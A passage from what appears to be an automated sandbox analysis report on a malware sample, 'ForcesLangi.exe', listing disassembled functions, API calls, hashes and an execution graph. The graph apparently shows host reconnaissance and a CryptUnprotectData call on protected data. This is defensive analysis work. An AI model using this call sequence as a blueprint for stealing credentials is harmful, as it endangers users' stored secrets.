                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                              • Opcode ID: 99fadec0f20956cbf7bec20e4786c7ec579e2a0087a39ff34ca8460e69511b45
                                                                                                                                                                                                                                              • Instruction ID: 68288891fd578538364034f08ac89119f0e2ce30ce7d3de14d0c30dfe22a7d7e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 99fadec0f20956cbf7bec20e4786c7ec579e2a0087a39ff34ca8460e69511b45
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 10F04431606BA4978A10DA64E684C5677F9FB8232C7706809F06DD7B00C731F884CA90
                                                                                                                                                                                                                                              Function 6CE32F05 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6CE33527: _free.LIBCMT ref: 6CE33535
                                                                                                                                                                                                                                                • Part of subcall function 6CE340FB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,6CE36093,?,00000000,00000000), ref: 6CE341A7
                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6CE32F6D
                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 6CE32F74
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6CE32FB3
                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 6CE32FBA
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 167067550-0
                                                                                                                                                                                                                                              • Opcode ID: 14c126fea042647f6268fc4068899733fe312fbeada0b96be32a5793e5147fab
                                                                                                                                                                                                                                              • Instruction ID: 14565cae5cc47ca762535df147e7741c0d47e32a5003b0bf53ebc42423db6917
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 14c126fea042647f6268fc4068899733fe312fbeada0b96be32a5793e5147fab
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0221D1716042256F9B105F668C858ABB7BCAF1536C7245619F4ACA7B45D730FC41CBE0
                                                                                                                                                                                                                                              Function 6CE329A7 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,6CE36A37,?,00000001,6CE34E8A,?,6CE36EF1,00000001,?,?,?,6CE34E19,?,00000000), ref: 6CE329AC
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6CE32A09
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6CE32A3F
                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,6CE36EF1,00000001,?,?,?,6CE34E19,?,00000000,00000000,6CE3FB78,0000002C,6CE34E8A), ref: 6CE32A4A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast_free
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2283115069-0
                                                                                                                                                                                                                                              • Opcode ID: 2098c9badd962ab94e434845881b313f6ff675ab96698e14fa537d499e436228
                                                                                                                                                                                                                                              • Instruction ID: 4d73798edca26e9659cb7cb5ace5f0a2b7cab87b18bd8a6697a9daae2fcf2b9a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2098c9badd962ab94e434845881b313f6ff675ab96698e14fa537d499e436228
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F41127363451352B9B1105B84C8CE66357A9BD377C735222AF16CC3B81EF31A80AC5E0
                                                                                                                                                                                                                                              Function 6CE32AFE Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00000001,6CE32DD0,6CE32D0D,?,?,6CE321F9), ref: 6CE32B03
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6CE32B60
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6CE32B96
                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,00000001,6CE32DD0,6CE32D0D,?,?,6CE321F9), ref: 6CE32BA1
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast_free
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2283115069-0
                                                                                                                                                                                                                                              • Opcode ID: acf56761ac17de2f9bbeff908b6a1e531e0321b96b1366fa9f3788bb7335721a
                                                                                                                                                                                                                                              • Instruction ID: e45a30f417e6860ccc17544f9a1af8ea0c0527f9dc4f29de97f4b07aa2d55639
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: acf56761ac17de2f9bbeff908b6a1e531e0321b96b1366fa9f3788bb7335721a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A311E7357416362ADB0109695C88E66257AABD377C7341229F16CC3781DF21A809C5A0
                                                                                                                                                                                                                                              Function 6CE37C86 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6CE376E0,?,00000001,?,00000001,?,6CE369C6,?,?,00000001), ref: 6CE37C9D
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,6CE376E0,?,00000001,?,00000001,?,6CE369C6,?,?,00000001,?,00000001,?,6CE36F12,6CE34E19), ref: 6CE37CA9
                                                                                                                                                                                                                                                • Part of subcall function 6CE37C6F: CloseHandle.KERNEL32(FFFFFFFE,6CE37CB9,?,6CE376E0,?,00000001,?,00000001,?,6CE369C6,?,?,00000001,?,00000001), ref: 6CE37C7F
                                                                                                                                                                                                                                              • ___initconout.LIBCMT ref: 6CE37CB9
                                                                                                                                                                                                                                                • Part of subcall function 6CE37C31: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CE37C60,6CE376CD,00000001,?,6CE369C6,?,?,00000001,?), ref: 6CE37C44
                                                                                                                                                                                                                                              • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6CE376E0,?,00000001,?,00000001,?,6CE369C6,?,?,00000001,?), ref: 6CE37CCE
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2744216297-0
                                                                                                                                                                                                                                              • Opcode ID: dd53351206900c1c32c072ddae400f03e15c03225856c80837f46e574a6d6b52
                                                                                                                                                                                                                                              • Instruction ID: c5ee740eeaa739be596fe3fdc739f5bd7e32cf6af160e539bc69e6f7ef687cc2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dd53351206900c1c32c072ddae400f03e15c03225856c80837f46e574a6d6b52
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00F03036640129FBCF226FD5CD04E8A3FB6FB4A3E4B164010FA1CA5620C736A960DF90
                                                                                                                                                                                                                                              Function 6CE31BF5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\ForcesLangi.exe
                                                                                                                                                                                                                                              • API String ID: 0-1466808870
                                                                                                                                                                                                                                              • Opcode ID: bbae7079d354c855fdf4e77d4e562726321b8d69b1730892759dd7a0a9516843
                                                                                                                                                                                                                                              • Instruction ID: 8a8e6ead444ac1211679c626dfe85b7a02190bf81a422816594e9e7c571dab4e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bbae7079d354c855fdf4e77d4e562726321b8d69b1730892759dd7a0a9516843
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B418271A00229ABCB169BD98884DDEBBF8EFC6718F31106EE418E7740D770EA45C790
                                                                                                                                                                                                                                              Function 6CE2FAC0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RaiseException.KERNEL32(E06D7363,00000001,00000003,Zl,?,?,?,6CE2EB5A,?,6CE3F86C), ref: 6CE2FB20
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionRaise
                                                                                                                                                                                                                                              • String ID: Zl$Zl
                                                                                                                                                                                                                                              • API String ID: 3997070919-2072720850
                                                                                                                                                                                                                                              • Opcode ID: 0b86cc849ebec441a0067b24bedf6a1a7ad1c4b2f9c35cb29ed226395ab89d5e
                                                                                                                                                                                                                                              • Instruction ID: a14331206312b36cf44d02ff620a89e8f8d939fa792b3cc97dff39b39e9e6ef7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0b86cc849ebec441a0067b24bedf6a1a7ad1c4b2f9c35cb29ed226395ab89d5e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9801A276A0021CABCB019F58C580BAEBBB8FF44708F314159E915AB790D7B8E900CB90

                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                              Execution Coverage:8.7%
                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                              Signature Coverage:59.7%
                                                                                                                                                                                                                                              Total number of Nodes:481
                                                                                                                                                                                                                                              Total number of Limit Nodes:35
                                                                                                                                                                                                                                              execution_graph 14240 74dc76 14242 74dc7c 14240->14242 14241 74dcf0 GetComputerNameExA 14242->14241 14242->14242 14243 7418f0 14244 7418fe 14243->14244 14248 741950 14243->14248 14249 741a10 14244->14249 14250 741a20 14249->14250 14250->14250 14253 7614b0 14250->14253 14252 741b0f 14254 7614d0 14253->14254 14256 7615fe 14254->14256 14257 75e110 LdrInitializeThunk 14254->14257 14256->14252 14257->14256 14258 72ec77 CoInitializeSecurity CoInitializeSecurity 14259 72cc7a 14312 728b60 14259->14312 14261 72cc86 14262 728b60 ExitProcess 14261->14262 14263 72cca2 14262->14263 14317 7442d0 14263->14317 14265 72cca8 14266 728b60 ExitProcess 14265->14266 14267 72ccbe 14266->14267 14328 744560 14267->14328 14269 72ccc4 14270 728b60 ExitProcess 14269->14270 14271 72ccd7 14270->14271 14339 747440 14271->14339 14275 72ccef 14357 749e80 14275->14357 14277 72ccf8 14278 728b60 ExitProcess 14277->14278 14279 72cd0e 14278->14279 14361 7490d0 14279->14361 14281 72cd14 14282 728b60 ExitProcess 14281->14282 14283 72cd2a 14282->14283 14284 753e30 6 API calls 14283->14284 14285 72cd39 14284->14285 14286 728b60 ExitProcess 14285->14286 14287 72cd4c 14286->14287 14288 728b60 ExitProcess 14287->14288 14289 72cd68 14288->14289 14290 7442d0 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings RtlFreeHeap LdrInitializeThunk 14289->14290 14291 72cd6e 14290->14291 14292 728b60 ExitProcess 14291->14292 14293 72cd84 14292->14293 14294 744560 RtlExpandEnvironmentStrings RtlFreeHeap LdrInitializeThunk 14293->14294 14295 72cd8a 14294->14295 14296 728b60 ExitProcess 14295->14296 14297 72cd9d 14296->14297 14298 747440 RtlFreeHeap LdrInitializeThunk 14297->14298 14299 72cdac 14298->14299 14300 747740 RtlFreeHeap LdrInitializeThunk 14299->14300 14301 72cdb5 14300->14301 14302 749e80 RtlExpandEnvironmentStrings 14301->14302 14303 72cdbe 14302->14303 14304 728b60 ExitProcess 14303->14304 14305 72cdd4 14304->14305 14306 7490d0 RtlExpandEnvironmentStrings 14305->14306 14307 72cdda 14306->14307 14308 728b60 ExitProcess 14307->14308 14309 72cdf0 14308->14309 14310 753e30 6 API calls 14309->14310 14311 72cdff 14310->14311 14365 728530 14312->14365 14314 728530 ExitProcess 14315 728b9d 14314->14315 14315->14314 14316 728bec 14315->14316 14316->14261 14318 744360 14317->14318 14318->14318 14319 744376 RtlExpandEnvironmentStrings 14318->14319 14321 7443d0 14319->14321 14322 7446e1 14321->14322 14324 744431 RtlExpandEnvironmentStrings 14321->14324 14327 744450 14321->14327 14369 7606f0 14321->14369 14377 760460 14322->14377 14324->14321 14324->14322 14324->14327 14327->14265 14329 74456e 14328->14329 14330 760340 LdrInitializeThunk 14329->14330 14332 744408 14330->14332 14331 7606f0 2 API calls 14331->14332 14332->14331 14333 7446e1 14332->14333 14336 744431 RtlExpandEnvironmentStrings 14332->14336 14338 744450 14332->14338 14334 760460 2 API calls 14333->14334 14335 744712 14334->14335 14337 760340 LdrInitializeThunk 14335->14337 14335->14338 14336->14332 14336->14333 14336->14338 14337->14338 14338->14269 14340 747460 14339->14340 14342 7474ae 14340->14342 14398 75e110 LdrInitializeThunk 14340->14398 14342->14342 14344 72cce6 14342->14344 14346 74756e 14342->14346 14399 75e110 LdrInitializeThunk 14342->14399 14343 75c570 RtlFreeHeap 14343->14344 14347 747740 14344->14347 14346->14343 14400 747760 14347->14400 14349 747754 14349->14275 14352 748080 14352->14275 14356 74804c 14356->14352 14417 761320 14356->14417 14421 761650 14356->14421 14425 761720 14356->14425 14358 749f10 14357->14358 14358->14358 14359 749f37 RtlExpandEnvironmentStrings 14358->14359 14360 749dd1 14359->14360 14360->14277 14362 749110 14361->14362 14362->14362 14363 749136 RtlExpandEnvironmentStrings 14362->14363 14364 749180 14363->14364 14364->14364 14366 728595 14365->14366 14367 728542 14365->14367 14366->14367 14368 72859c ExitProcess 14366->14368 14367->14315 14368->14367 14370 760710 14369->14370 14373 76075e 14370->14373 14389 75e110 LdrInitializeThunk 14370->14389 14371 7609d3 14371->14321 14373->14371 14376 76084e 14373->14376 14390 75e110 LdrInitializeThunk 14373->14390 14376->14376 14391 75c570 14376->14391 14378 760480 14377->14378 14381 7604ce 14378->14381 14395 75e110 LdrInitializeThunk 14378->14395 14379 744712 14379->14327 14385 760340 14379->14385 14381->14379 14384 7605af 14381->14384 14396 75e110 LdrInitializeThunk 14381->14396 14382 75c570 RtlFreeHeap 14382->14379 14384->14382 14387 760360 14385->14387 14386 76042f 14386->14327 14387->14386 14397 75e110 LdrInitializeThunk 14387->14397 14389->14373 14390->14376 14392 75c585 14391->14392 14393 75c583 14391->14393 14394 75c58a RtlFreeHeap 14392->14394 14393->14371 14394->14371 14395->14381 14396->14384 14397->14386 14398->14342 14399->14346 14401 7477a0 14400->14401 14401->14401 14431 75c5a0 14401->14431 14405 74782f 14451 75c990 14405->14451 14406 747823 14406->14405 14406->14406 14443 75cdf0 14406->14443 14410 75a2a0 14416 75a2d0 14410->14416 14411 760340 LdrInitializeThunk 14411->14416 14412 7606f0 2 API calls 14412->14416 14413 75a428 14413->14356 14416->14411 14416->14412 14416->14413 14461 760d20 14416->14461 14469 75e110 LdrInitializeThunk 14416->14469 14419 761340 14417->14419 14418 76145e 14418->14356 14419->14418 14472 75e110 LdrInitializeThunk 14419->14472 14422 761680 14421->14422 14422->14422 14423 7616ce 14422->14423 14473 75e110 LdrInitializeThunk 14422->14473 14423->14356 14426 761750 14425->14426 14427 7617a9 14426->14427 14474 75e110 LdrInitializeThunk 14426->14474 14427->14427 14428 76184e 14427->14428 14475 75e110 LdrInitializeThunk 14427->14475 14428->14356 14432 75c5d0 14431->14432 14435 75c62e 14432->14435 14455 75e110 LdrInitializeThunk 14432->14455 14433 747817 14439 75c830 14433->14439 14435->14433 14438 75c749 14435->14438 14456 75e110 LdrInitializeThunk 14435->14456 14436 75c570 RtlFreeHeap 14436->14433 14438->14436 14440 75c841 14439->14440 14441 75c8fe 14439->14441 14440->14441 14457 75e110 LdrInitializeThunk 14440->14457 14441->14406 14445 75ce40 14443->14445 14444 75d60e 14444->14406 14450 75ce9e 14445->14450 14458 75e110 LdrInitializeThunk 14445->14458 14447 75d59a 14447->14444 14459 75e110 LdrInitializeThunk 14447->14459 14449 75e110 LdrInitializeThunk 14449->14450 14450->14444 14450->14447 14450->14449 14452 747749 14451->14452 14453 75c99a 14451->14453 14452->14349 14452->14410 14453->14452 14460 75e110 LdrInitializeThunk 14453->14460 14455->14435 14456->14438 14457->14441 14458->14450 14459->14444 14460->14452 14462 760d2f 14461->14462 14465 760e98 14462->14465 14470 75e110 LdrInitializeThunk 14462->14470 14464 75c570 RtlFreeHeap 14466 76114b 14464->14466 14465->14466 14468 76108e 14465->14468 14471 75e110 LdrInitializeThunk 14465->14471 14466->14416 14468->14464 14469->14416 14470->14465 14471->14468 14472->14418 14473->14423 14474->14427 14475->14428 14476 7439b9 14478 74374a 14476->14478 14479 743406 14476->14479 14477 743b50 RtlExpandEnvironmentStrings 14481 743c50 14477->14481 14478->14476 14478->14477 14478->14478 14478->14479 14478->14481 14486 743ce2 14478->14486 14504 75e110 LdrInitializeThunk 14478->14504 14481->14479 14482 743c9e RtlExpandEnvironmentStrings 14481->14482 14483 743f58 14481->14483 14481->14486 14489 743def 14481->14489 14482->14479 14482->14483 14482->14486 14482->14489 14483->14479 14483->14483 14491 741d00 14483->14491 14486->14486 14487 7614b0 LdrInitializeThunk 14486->14487 14487->14489 14488 743f41 GetLogicalDrives 14490 7614b0 LdrInitializeThunk 14488->14490 14489->14479 14489->14483 14489->14488 14489->14489 14490->14483 14492 761320 LdrInitializeThunk 14491->14492 14496 741d43 14492->14496 14493 7423f5 14493->14479 14495 75c570 RtlFreeHeap 14497 74239e 14495->14497 14496->14493 14503 741de9 14496->14503 14505 75e110 LdrInitializeThunk 14496->14505 14497->14493 14507 75e110 LdrInitializeThunk 14497->14507 14498 742383 14498->14495 14500 74245a 14498->14500 14502 75c570 RtlFreeHeap 14502->14503 14503->14498 14503->14502 14506 75e110 LdrInitializeThunk 14503->14506 14504->14478 14505->14496 14506->14503 14507->14497 14508 757764 14509 75777c 14508->14509 14510 75779d GetUserDefaultUILanguage 14509->14510 14511 7577c7 14510->14511 14512 75e967 14513 75e980 14512->14513 14516 75e110 LdrInitializeThunk 14513->14516 14515 75e9ef 14516->14515 14517 731227 14518 731241 14517->14518 14519 7314e5 RtlExpandEnvironmentStrings 14518->14519 14523 72f444 14518->14523 14524 731562 14519->14524 14520 728b60 ExitProcess 14521 731c4e 14520->14521 14525 7357c0 14521->14525 14524->14520 14524->14523 14526 7357e0 14525->14526 14526->14526 14527 761320 LdrInitializeThunk 14526->14527 14528 7358ed 14527->14528 14529 735cad 14528->14529 14530 73590f 14528->14530 14531 761650 LdrInitializeThunk 14528->14531 14535 73594e 14528->14535 14536 735ae8 14528->14536 14538 735b92 14528->14538 14534 761650 LdrInitializeThunk 14529->14534 14529->14535 14540 735cf7 14529->14540 14530->14529 14532 761720 LdrInitializeThunk 14530->14532 14530->14535 14530->14536 14530->14538 14531->14530 14533 73593f 14532->14533 14533->14529 14533->14535 14533->14536 14533->14538 14534->14540 14535->14523 14536->14535 14606 75e110 LdrInitializeThunk 14536->14606 14537 7360df 14537->14523 14554 736319 14537->14554 14559 73634d 14537->14559 14562 73c8a0 14537->14562 14541 761320 LdrInitializeThunk 14538->14541 14540->14537 14542 761720 LdrInitializeThunk 14540->14542 14548 7360b5 CryptUnprotectData 14540->14548 14561 75e110 LdrInitializeThunk 14540->14561 14541->14529 14542->14540 14547 736f0e 14548->14537 14548->14540 14549 7365bd 14550 73c8a0 3 API calls 14549->14550 14550->14535 14553 7368eb 14553->14547 14553->14553 14609 75e110 LdrInitializeThunk 14553->14609 14574 739ad0 14554->14574 14555 73731b 14557 7366be 14558 736792 14557->14558 14607 75e110 LdrInitializeThunk 14557->14607 14558->14553 14608 75e110 LdrInitializeThunk 14558->14608 14559->14535 14559->14549 14560 7614b0 LdrInitializeThunk 14559->14560 14560->14559 14561->14540 14563 73c8ca 14562->14563 14610 734ca0 14563->14610 14565 73c9cb 14566 734ca0 3 API calls 14565->14566 14567 73ca59 14566->14567 14568 734ca0 3 API calls 14567->14568 14569 73cadf 14568->14569 14570 734ca0 3 API calls 14569->14570 14571 73cbf9 14570->14571 14572 734ca0 3 API calls 14571->14572 14573 73cc62 14572->14573 14573->14554 14575 739b00 14574->14575 14579 739b78 14575->14579 14691 75e110 LdrInitializeThunk 14575->14691 14577 739cbe 14582 739d6e 14577->14582 14599 736338 14577->14599 14693 75e110 LdrInitializeThunk 14577->14693 14579->14577 14692 75e110 LdrInitializeThunk 14579->14692 14581 739eef 14583 75c570 RtlFreeHeap 14581->14583 14582->14581 14590 739f48 14582->14590 14694 75e110 LdrInitializeThunk 14582->14694 14583->14590 14585 73a2a7 FreeLibrary 14589 73a157 14585->14589 14587 73a152 14587->14585 14588 73a216 FreeLibrary 14587->14588 14592 73a230 14588->14592 14589->14599 14696 75e110 LdrInitializeThunk 14589->14696 14590->14585 14590->14587 14590->14589 14590->14599 14695 75e110 LdrInitializeThunk 14590->14695 14594 73a2a2 14592->14594 14697 75e110 LdrInitializeThunk 14592->14697 14596 73a3fe 14594->14596 14698 75e110 LdrInitializeThunk 14594->14698 14596->14599 14605 73a4de 14596->14605 14699 75e110 LdrInitializeThunk 14596->14699 14597 73ac58 14598 75c570 RtlFreeHeap 14597->14598 14598->14599 14599->14557 14599->14559 14601 75c830 LdrInitializeThunk 14601->14605 14602 75c990 LdrInitializeThunk 14602->14605 14603 75c570 RtlFreeHeap 14603->14605 14604 75e110 LdrInitializeThunk 14604->14605 14605->14597 14605->14601 14605->14602 14605->14603 14605->14604 14606->14557 14607->14558 14608->14553 14609->14555 14611 734cc0 14610->14611 14612 761320 LdrInitializeThunk 14611->14612 14613 734e14 14612->14613 14614 761320 LdrInitializeThunk 14613->14614 14644 735021 14614->14644 14615 73509e 14616 7350e9 14615->14616 14617 73522e 14615->14617 14648 735170 14615->14648 14619 75c570 RtlFreeHeap 14616->14619 14617->14565 14622 7350ef 14619->14622 14620 735551 14669 75e110 LdrInitializeThunk 14620->14669 14623 735152 14622->14623 14678 75e110 LdrInitializeThunk 14622->14678 14624 7357b0 14623->14624 14625 7356a1 14623->14625 14626 7355d3 14623->14626 14627 7356d2 14623->14627 14628 73579e 14623->14628 14629 735625 14623->14629 14632 75c5a0 2 API calls 14623->14632 14637 73563c 14623->14637 14647 735696 14623->14647 14649 7355ff 14623->14649 14634 75c990 LdrInitializeThunk 14624->14634 14625->14627 14630 761650 LdrInitializeThunk 14625->14630 14625->14637 14625->14647 14625->14649 14626->14624 14626->14625 14626->14627 14626->14628 14626->14629 14626->14637 14626->14647 14626->14649 14670 75ca40 14626->14670 14631 761650 LdrInitializeThunk 14627->14631 14633 75c990 LdrInitializeThunk 14628->14633 14636 761320 LdrInitializeThunk 14629->14636 14630->14627 14631->14637 14640 7355c7 14632->14640 14633->14624 14641 7357b9 14634->14641 14636->14637 14638 761720 LdrInitializeThunk 14637->14638 14637->14647 14637->14649 14638->14637 14639 75e110 LdrInitializeThunk 14639->14648 14645 75c830 LdrInitializeThunk 14640->14645 14641->14641 14644->14615 14644->14616 14644->14648 14651 75e110 LdrInitializeThunk 14644->14651 14645->14626 14647->14649 14679 75e110 LdrInitializeThunk 14647->14679 14648->14617 14648->14620 14648->14639 14652 759d30 14648->14652 14649->14565 14651->14615 